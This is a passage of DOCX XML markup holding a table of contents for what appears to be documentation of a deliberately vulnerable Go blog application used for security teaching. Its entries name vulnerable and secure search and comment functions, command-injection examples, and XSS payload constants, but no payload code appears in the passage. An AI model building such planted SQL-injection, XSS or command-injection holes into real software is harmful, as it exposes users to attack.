      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec118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119">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8. internal/service </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec119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20">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.1. Typy </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec120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21">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.2. Comment </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec121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22">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.3. Post </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec122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23">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.4. Service </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec123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24">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.5. UserRecord </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec124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25">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.6. loginRecord </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec125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26">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.7. rateLimiter </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec126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27">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.8. Stałe i zmienne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sec127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28">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.9. eventAttributeRE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sec128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29">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.10. javascriptSchemeRE </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec129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30">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.11. lockoutSeconds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sec130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31">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.12. maxFailures </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec131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32">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.13. scriptTagRE </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec132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33">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.14. Funkcje i metody </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec133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34">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.15. newRateLimiter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sec134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35">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.16. New </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec135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36">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.17. NewWithMode </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec136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37">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.18. *Service.SecurityEnabled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sec137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38">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.19. *Service.SetSecurityEnabled </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec138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39">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.20. *Service.GetPublishedPosts </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec139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40">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.21. *Service.GetAllPosts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sec140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41">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.22. *Service.GetPostByID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sec141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42">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.23. *Service.SearchPosts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sec142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43">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.24. *Service.SearchPostsVulnerable </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec143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44">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.25. *Service.SearchPostsSecure </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec144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45">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.26. scanPostRows </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec145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46">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.27. *Service.CreatePost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sec146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47">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.28. *Service.UpdatePost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sec147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48">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.29. *Service.DeletePost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sec148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49">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.30. *Service.GetPostAuthor </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec149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50">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.31. *Service.CreateUser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sec150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51">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.32. *Service.preparePassword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sec151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52">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.33. *Service.UserExists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sec152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53">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.34. *Service.ValidateUserCredentials </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec153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54">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.35. *Service.GetDB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sec154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55">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.36. *Service.IsUserAdmin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sec155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56">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.37. *Service.CreateComment </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec156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57">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.38. stripUnsafeHTML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sec157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58">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.39. *Service.CreateCommentVulnerable </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec158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59">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.40. *Service.GetCommentsByPostID </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec159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60">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.41. *Service.GetAllUsers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sec160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61">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.42. *Service.UpdateUserEmail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sec161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62">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.43. *Service.GetUserEmail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sec162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63">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.44. *Service.CheckRateLimit </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec163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64">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8.45. *Service.RecordLoginFailure </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec164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165">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9. internal/views </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec165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66">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.1. Funkcje i metody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sec166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67">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.2. cmdInjectionCodeDiff </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec167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68">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.3. cmdInjectionCurlExamples </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec168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69">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.4. layoutBodyClass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sec169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70">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.5. commentPlaceholder </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec170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71">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.6. authHeroTip </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec171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0"/>
      </w:pPr>
      <w:hyperlink w:anchor="sec172">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10. root </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec172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73">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.1. Typy </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec173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74">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.2. postDTO </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec174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75">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.3. Stałe i zmienne </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec175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76">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.4. _ </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec176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77">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.5. uploadsDir </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec177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78">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.6. xssImgPayload </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec178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79">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.7. xssOverlayPayload </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec179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80">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.8. xssScriptPayload </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec180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81">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
